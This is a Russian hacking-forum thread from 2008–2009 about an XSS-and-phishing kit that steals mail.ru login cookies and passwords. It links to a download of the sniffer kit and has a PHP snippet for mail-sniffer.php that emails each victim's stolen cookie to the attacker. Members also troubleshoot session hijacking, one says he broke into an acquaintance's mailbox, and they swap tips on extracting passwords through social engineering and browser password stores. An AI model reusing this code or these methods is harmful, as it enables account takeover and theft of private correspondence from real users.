mail.ru: XSS + фейк (2 в 1)

Discussion in 'Уязвимости Mail-сервисов' started by Ponchik, 8 Dec 2008.

  1. login999

    login999 Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    491
    Likes Received:
    280
    Reputations:
    92
    Фейк твой ни при чем, просто запостил в тему, где упоминалась mail.ru (мож кому пригодится). Звиняй, если что не так
    П.С. - если захочешь, то снесу ... :)
     
    2 people like this.
  2. miqo

    miqo Banned

    Joined:
    18 Nov 2008
    Messages:
    100
    Likes Received:
    0
    Reputations:
    -1
    плз дайте рабочий линк!!!!
     
  3. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html - рабочий вполне
     
  4. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    А чё XSS ещё живая О_о
    DIMON4G, ппц, это защита от школьников, убери пост
     
  5. pvv

    pvv New Member

    Joined:
    29 Jul 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    нет, не работает
     
    1 person likes this.
  6. fuck all

    fuck all Member

    Joined:
    23 Nov 2008
    Messages:
    13
    Likes Received:
    8
    Reputations:
    0
    У меня на снифф приходят только данные с фейка :(
     
  7. pavlik74

    pavlik74 New Member

    Joined:
    16 Jan 2007
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Все?? похоже прикрыли?
     
  8. waik

    waik Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    405
    Likes Received:
    163
    Reputations:
    12
    неннаю ,посмотрел видео но вот насчет Vmware я нечего непонял ,гугил чтоб понять как её поставить но нечего непонял ,но всё равно молодец !! ЗАчет

    пишет ошибку Parse error: syntax error, unexpected T_STRING in /home/a6256423/public_html/mail/mail-sniffer.php on line 7
    когда вводишь пароль и наживаешь войти
     
    #28 waik, 14 Jan 2009
    Last edited: 14 Jan 2009
    1 person likes this.
  9. AntikasS

    AntikasS New Member

    Joined:
    12 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Вообще-то устанавливать виртуальную машину вовсе не обязательно, что бы проверить, работает ли всё.
    В этой строчке защита от школьников.

    А вот у меня вопрос такой: Как задать разрешение не запись? Или посоветуйте хост, где можно так сделать. И вообще на видео у чела "домашний" Apache сервак. Так как быть?

    А! Всё, ребят, не надо. Сам допер. И кукисы и с фейка приходит! +5 Ponchik'у )))
     
    #29 AntikasS, 14 Jan 2009
    Last edited: 14 Jan 2009
  10. pavlik74

    pavlik74 New Member

    Joined:
    16 Jan 2007
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    С чем связано, один отчет пришел с куками которые не ставят пароль при обновлении странички.. другой отчет все хорошо... и логин и пароль???
     
    #30 pavlik74, 15 Jan 2009
    Last edited: 15 Jan 2009
  11. AntikasS

    AntikasS New Member

    Joined:
    12 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Ты наверно забыл удалить все остальные куки от mail.ru, у меня всё работает. Это насчет первого. А насчет другого отчета - ПОБЕДА!!!
    Ставь + Ponchick'у!
    Только 1 '-' в том, что жертва обязана обязательно открыть фото прямо из браузера :(
     
    #31 AntikasS, 15 Jan 2009
    Last edited: 15 Jan 2009
  12. Пётр

    Пётр Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    хех, после видео допёрло как работает данный фейк))) гг)

    Хм, а ваще зачётная вещь!
    Только пашед на ИЕ, в опере не кушает + письмо не удаляется...
    --------------------
    прошёл тест на знакомой, на фейк не повелась, но через куки вошёл в её мыло... вопрос терь в другом, сменить пасс или изменить данные для восстановления низя, нужен пасс... как его раздобыть?
    возможно ли методом "сохранить пароль" фишкой оперы, а потом из файлов оперы вытянуть его? прога у меня есть... только не могу потестить, я отключил запоминалку паролей для мыла.ру (((
     
    #32 Пётр, 20 Jan 2009
    Last edited: 20 Jan 2009
  13. Bl1Zz

    Bl1Zz Elder - Старейшина

    Joined:
    5 Sep 2007
    Messages:
    43
    Likes Received:
    6
    Reputations:
    0
    to Ponchik , спасибо с меня ++ ))
    А возможно сделать что-б работала тема и на мозилу? а то просит скачать сцуко (
     
  14. Пётр

    Пётр Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    добавил "оповещение на мыло", когда жертва прошла сниффер, на мыло придут куки... каму над:
    в mail-sniffer.php, в куске работы снифера (до "}else{") вставляем код и меняем мыла на свои:
    Code:
    $from = "[email protected]"; // от кого письмо
    $to = "[email protected]"; // кому присылаем данные
    
    $subj = " Куки"; // тема письма
    $body = " Cookie: $cookie"; // тело письма
    
    $from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"; 
    $from=convert_cyr_string($from,"w","k"); 
    $to=convert_cyr_string($to,"w","k"); 
    $subj=convert_cyr_string($subj,"w","k"); 
    $body=convert_cyr_string($body,"w","k"); 
    mail($to,$subj,$body,$from);
    
     
    #34 Пётр, 22 Jan 2009
    Last edited: 22 Jan 2009
  15. Campery

    Campery Member

    Joined:
    30 Nov 2008
    Messages:
    38
    Likes Received:
    51
    Reputations:
    0
    что за ерунда может быть, обычно нормальные куки, все заходит под ними, а щас какаято ерунда:

    и не заходит под ними.. :/ меня смущает минус в конце.. в чем дело?
     
  16. Пётр

    Пётр Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    возможно в минусе дело... никогда минуса не видел, хз
     
  17. Пётр

    Пётр Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    вот вопрос тоже на счёт куков... в строке с Mpop есть следующее:
    Code:
    geo_city_id=xxxx;
    где можно расшифровать город? гуглил, ничего не нашёл...
     
  18. AntikasS

    AntikasS New Member

    Joined:
    12 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Итак, может я и новичок, но последнюю неделю я в этом деле очень поднялся.
    C минусом мне тоже приходило, все работает. Другое дело, что вам приходит не зашифрованный пароль, а некий хеш сессии. А она не долговечна (У mail.ru около часа). Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь. Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках, иначе самому надо размещать и настраивать sendmail а это не приведи господь...

    Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.
     
  19. Пётр

    Пётр Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    ну эт да, я на платнике сижу (ресселер), пока живой))
    а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)
    ща например весь день захожу на мыло под куками, а вот пасс не наю =\
    своим оповещение доволен... а вот на счёт логов... приходиться сразу лезть через ftp и смареть... хорошо бы на сам деле сделать удобный просмотр!
     
  20. AntikasS

    AntikasS New Member

    Joined:
    12 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Там такая вроде такая фишка: когда жертва вводит логин и пасс, mail.ru открывает сессию и единственная "проверка на вшивость" хеш из Mpop. Когда же мы подставляем куки, он при обновлении страницы выводит нам логин и пасс(звездачками), думая, что мы - жертва. Opera пароль вроде сохраняет (по крайней мере у меня).А именно узнать сам пароль наверно проще всего с помощью СИ: пароли на форумах, ВКОНТАКТЕ, и т.д.

    А про мой скрипт - к 3 часам ночи допишу)))